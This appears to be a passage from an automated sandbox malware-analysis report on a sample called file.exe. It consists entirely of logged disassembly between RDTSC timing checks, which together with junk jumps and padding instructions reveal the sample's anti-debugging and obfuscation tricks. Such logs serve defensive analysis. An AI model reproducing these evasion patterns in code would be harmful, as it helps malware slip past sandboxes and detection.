                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10646 second address: 4A1064C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1064C second address: 4A10656 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 16DECE65h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10656 second address: 4A1067C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [ebx+5Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7174CEBA98h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1067C second address: 4A10680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10680 second address: 4A10686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10686 second address: 4A106D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 pushfd 0x00000007 jmp 00007F7174BA6FE9h 0x0000000c sub cx, 4FC6h 0x00000011 jmp 00007F7174BA6FE1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esi+20h], eax 0x0000001d pushad 0x0000001e mov ax, C113h 0x00000022 movzx esi, dx 0x00000025 popad 0x00000026 mov eax, dword ptr [ebx+60h] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106D5 second address: 4A106D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106D9 second address: 4A106DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106DD second address: 4A106E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A106E3 second address: 4A10710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7174BA6FE5h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10710 second address: 4A10752 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c jmp 00007F7174CEBA8Eh 0x00000011 mov dword ptr [esi+28h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F7174CEBA97h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10752 second address: 4A107BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7174BA6FDFh 0x00000008 pop ecx 0x00000009 push ebx 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebx+68h] 0x00000011 jmp 00007F7174BA6FDBh 0x00000016 mov dword ptr [esi+2Ch], eax 0x00000019 pushad 0x0000001a mov bh, ah 0x0000001c pushfd 0x0000001d jmp 00007F7174BA6FE1h 0x00000022 adc ecx, 288C3806h 0x00000028 jmp 00007F7174BA6FE1h 0x0000002d popfd 0x0000002e popad 0x0000002f mov ax, word ptr [ebx+6Ch] 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F7174BA6FDDh 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107BC second address: 4A107F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+30h], ax 0x0000000d jmp 00007F7174CEBA8Eh 0x00000012 mov ax, word ptr [ebx+00000088h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov edi, eax 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A107F0 second address: 4A108C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7174BA6FDBh 0x00000008 pushfd 0x00000009 jmp 00007F7174BA6FE8h 0x0000000e jmp 00007F7174BA6FE5h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov word ptr [esi+32h], ax 0x0000001b jmp 00007F7174BA6FDEh 0x00000020 mov eax, dword ptr [ebx+0000008Ch] 0x00000026 pushad 0x00000027 mov ecx, 02061A0Dh 0x0000002c mov ch, 4Ah 0x0000002e popad 0x0000002f mov dword ptr [esi+34h], eax 0x00000032 pushad 0x00000033 mov di, F6E6h 0x00000037 mov edi, 3DBE9B72h 0x0000003c popad 0x0000003d mov eax, dword ptr [ebx+18h] 0x00000040 jmp 00007F7174BA6FE9h 0x00000045 mov dword ptr [esi+38h], eax 0x00000048 pushad 0x00000049 mov ax, B7A3h 0x0000004d pushfd 0x0000004e jmp 00007F7174BA6FE8h 0x00000053 jmp 00007F7174BA6FE5h 0x00000058 popfd 0x00000059 popad 0x0000005a mov eax, dword ptr [ebx+1Ch] 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F7174BA6FDDh 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A108C5 second address: 4A10946 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7174CEBA93h 0x00000009 add ecx, 0C07098Eh 0x0000000f jmp 00007F7174CEBA99h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esi+3Ch], eax 0x0000001b pushad 0x0000001c jmp 00007F7174CEBA8Ch 0x00000021 mov edx, eax 0x00000023 popad 0x00000024 mov eax, dword ptr [ebx+20h] 0x00000027 pushad 0x00000028 mov si, 91D9h 0x0000002c mov edi, esi 0x0000002e popad 0x0000002f mov dword ptr [esi+40h], eax 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F7174CEBA8Eh 0x00000039 and eax, 560A3E68h 0x0000003f jmp 00007F7174CEBA8Bh 0x00000044 popfd 0x00000045 push eax 0x00000046 push edx 0x00000047 mov ebx, esi 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10946 second address: 4A1094A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1094A second address: 4A10976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 lea eax, dword ptr [ebx+00000080h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F7174CEBA8Ah 0x00000016 xor si, 10C8h 0x0000001b jmp 00007F7174CEBA8Bh 0x00000020 popfd 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10976 second address: 4A109E6 instructions: 0x00000000 rdtsc 0x00000002 call 00007F7174BA6FE8h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop eax 0x0000000d popad 0x0000000e popad 0x0000000f push 00000001h 0x00000011 jmp 00007F7174BA6FDFh 0x00000016 nop 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F7174BA6FE4h 0x0000001e sub cl, FFFFFFB8h 0x00000021 jmp 00007F7174BA6FDBh 0x00000026 popfd 0x00000027 pushad 0x00000028 mov ecx, 2EA85E85h 0x0000002d mov edx, esi 0x0000002f popad 0x00000030 popad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F7174BA6FDAh 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A109E6 second address: 4A10A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F7174CEBA97h 0x0000000b adc ch, FFFFFFDEh 0x0000000e jmp 00007F7174CEBA99h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 jmp 00007F7174CEBA8Eh 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 jmp 00007F7174CEBA90h 0x00000025 nop 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A4C second address: 4A10A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A50 second address: 4A10A54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A54 second address: 4A10A5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A5A second address: 4A10A6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 mov bx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A6B second address: 4A10A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7174BA6FE2h 0x0000000a or ah, FFFFFF98h 0x0000000d jmp 00007F7174BA6FDBh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10A92 second address: 4A10AD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushfd 0x00000007 jmp 00007F7174CEBA90h 0x0000000c xor esi, 3C8C4EF8h 0x00000012 jmp 00007F7174CEBA8Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F7174CEBA95h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10AD6 second address: 4A10ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B21 second address: 4A10B25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B25 second address: 4A10B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B2B second address: 4A10B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174CEBA8Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10B3C second address: 4A10C4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F7174BA6FE3h 0x00000014 add cx, C83Eh 0x00000019 jmp 00007F7174BA6FE9h 0x0000001e popfd 0x0000001f popad 0x00000020 js 00007F71E4F95B0Fh 0x00000026 jmp 00007F7174BA6FDEh 0x0000002b mov eax, dword ptr [ebp-0Ch] 0x0000002e jmp 00007F7174BA6FE0h 0x00000033 mov dword ptr [esi+04h], eax 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F7174BA6FDEh 0x0000003d or ax, 3798h 0x00000042 jmp 00007F7174BA6FDBh 0x00000047 popfd 0x00000048 pushfd 0x00000049 jmp 00007F7174BA6FE8h 0x0000004e sub ecx, 13E261F8h 0x00000054 jmp 00007F7174BA6FDBh 0x00000059 popfd 0x0000005a popad 0x0000005b lea eax, dword ptr [ebx+78h] 0x0000005e jmp 00007F7174BA6FE6h 0x00000063 push 00000001h 0x00000065 pushad 0x00000066 mov ax, B7EDh 0x0000006a jmp 00007F7174BA6FDAh 0x0000006f popad 0x00000070 nop 0x00000071 jmp 00007F7174BA6FE0h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007F7174BA6FDDh 0x00000080 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C4F second address: 4A10C55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10C55 second address: 4A10CFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 pushfd 0x00000007 jmp 00007F7174BA6FE6h 0x0000000c xor cl, 00000048h 0x0000000f jmp 00007F7174BA6FDBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 nop 0x00000019 jmp 00007F7174BA6FE6h 0x0000001e lea eax, dword ptr [ebp-08h] 0x00000021 jmp 00007F7174BA6FE0h 0x00000026 nop 0x00000027 pushad 0x00000028 pushad 0x00000029 mov ecx, 41310833h 0x0000002e jmp 00007F7174BA6FE8h 0x00000033 popad 0x00000034 mov ax, E811h 0x00000038 popad 0x00000039 push eax 0x0000003a pushad 0x0000003b mov esi, ebx 0x0000003d push ebx 0x0000003e mov eax, 52FB7A8Bh 0x00000043 pop eax 0x00000044 popad 0x00000045 nop 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F7174BA6FE9h 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10CFE second address: 4A10D04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D04 second address: 4A10D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D1D second address: 4A10D48 instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov bl, ch 0x00000009 popad 0x0000000a mov edi, eax 0x0000000c jmp 00007F7174CEBA97h 0x00000011 test edi, edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D48 second address: 4A10D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D4C second address: 4A10D50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D50 second address: 4A10D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D56 second address: 4A10D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D5C second address: 4A10D8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F71E4F95919h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7174BA6FDAh 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D8A second address: 4A10D99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10D99 second address: 4A10DE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-04h] 0x0000000c jmp 00007F7174BA6FDEh 0x00000011 mov dword ptr [esi+08h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F7174BA6FE7h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10DE3 second address: 4A10E15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+70h] 0x0000000c pushad 0x0000000d mov cx, FB13h 0x00000011 mov cx, 356Fh 0x00000015 popad 0x00000016 push 00000001h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b movzx ecx, bx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E15 second address: 4A10E4B instructions: 0x00000000 rdtsc 0x00000002 call 00007F7174BA6FE3h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a movsx edx, ax 0x0000000d popad 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7174BA6FE7h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E4B second address: 4A10EA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7174CEBA8Fh 0x00000009 jmp 00007F7174CEBA93h 0x0000000e popfd 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 pushad 0x00000016 movsx edx, si 0x00000019 pushfd 0x0000001a jmp 00007F7174CEBA8Eh 0x0000001f add eax, 510CECB8h 0x00000025 jmp 00007F7174CEBA8Bh 0x0000002a popfd 0x0000002b popad 0x0000002c nop 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10EA5 second address: 4A10EAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10EAB second address: 4A10F0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F7174CEBA96h 0x0000000b sbb esi, 10548648h 0x00000011 jmp 00007F7174CEBA8Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a lea eax, dword ptr [ebp-18h] 0x0000001d jmp 00007F7174CEBA96h 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F7174CEBA97h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10F0F second address: 4A10F27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174BA6FE4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10F27 second address: 4A10F2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10F2B second address: 4A10F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bx, CB4Eh 0x00000010 pushfd 0x00000011 jmp 00007F7174BA6FDFh 0x00000016 adc cl, FFFFFFFEh 0x00000019 jmp 00007F7174BA6FE9h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10F69 second address: 4A10F6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1101F second address: 4A11023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11023 second address: 4A11027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11027 second address: 4A1102D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1102D second address: 4A1106E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174CEBA8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c jmp 00007F7174CEBA90h 0x00000011 mov edx, 74E806ECh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7174CEBA97h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1106E second address: 4A11099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7174BA6FDAh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11099 second address: 4A110DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 83h 0x00000005 pushfd 0x00000006 jmp 00007F7174CEBA8Ah 0x0000000b sbb cx, ADF8h 0x00000010 jmp 00007F7174CEBA8Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 lock cmpxchg dword ptr [edx], ecx 0x0000001d jmp 00007F7174CEBA96h 0x00000022 pop edi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A110DE second address: 4A110E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A110E2 second address: 4A110E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A110E6 second address: 4A110EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A110EC second address: 4A1112F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dl, ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test eax, eax 0x0000000c jmp 00007F7174CEBA93h 0x00000011 jne 00007F71E50DA057h 0x00000017 jmp 00007F7174CEBA96h 0x0000001c mov edx, dword ptr [ebp+08h] 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1112F second address: 4A11133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11133 second address: 4A111FD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7174CEBA8Ah 0x00000008 xor ah, 00000048h 0x0000000b jmp 00007F7174CEBA8Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov esi, 77E257BFh 0x00000018 popad 0x00000019 mov eax, dword ptr [esi] 0x0000001b pushad 0x0000001c call 00007F7174CEBA90h 0x00000021 pushfd 0x00000022 jmp 00007F7174CEBA92h 0x00000027 sbb al, FFFFFFD8h 0x0000002a jmp 00007F7174CEBA8Bh 0x0000002f popfd 0x00000030 pop esi 0x00000031 mov esi, ebx 0x00000033 popad 0x00000034 mov dword ptr [edx], eax 0x00000036 pushad 0x00000037 mov si, bx 0x0000003a mov edi, 41A24920h 0x0000003f popad 0x00000040 mov eax, dword ptr [esi+04h] 0x00000043 jmp 00007F7174CEBA8Fh 0x00000048 mov dword ptr [edx+04h], eax 0x0000004b jmp 00007F7174CEBA96h 0x00000050 mov eax, dword ptr [esi+08h] 0x00000053 pushad 0x00000054 pushfd 0x00000055 jmp 00007F7174CEBA8Eh 0x0000005a xor ch, FFFFFFC8h 0x0000005d jmp 00007F7174CEBA8Bh 0x00000062 popfd 0x00000063 push ecx 0x00000064 mov edi, 1A49836Ah 0x00000069 pop edi 0x0000006a popad 0x0000006b mov dword ptr [edx+08h], eax 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 mov dh, CCh 0x00000073 movzx esi, di 0x00000076 popad 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A111FD second address: 4A11220 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7174BA6FDAh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11220 second address: 4A11224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11224 second address: 4A1122A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1122A second address: 4A1123B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7174CEBA8Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1123B second address: 4A11278 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7174BA6FE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+0Ch], eax 0x0000000e jmp 00007F7174BA6FDEh 0x00000013 mov eax, dword ptr [esi+10h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 call 00007F7174BA6FDDh 0x0000001e pop ecx 0x0000001f popad 0x00000020 rdtsc
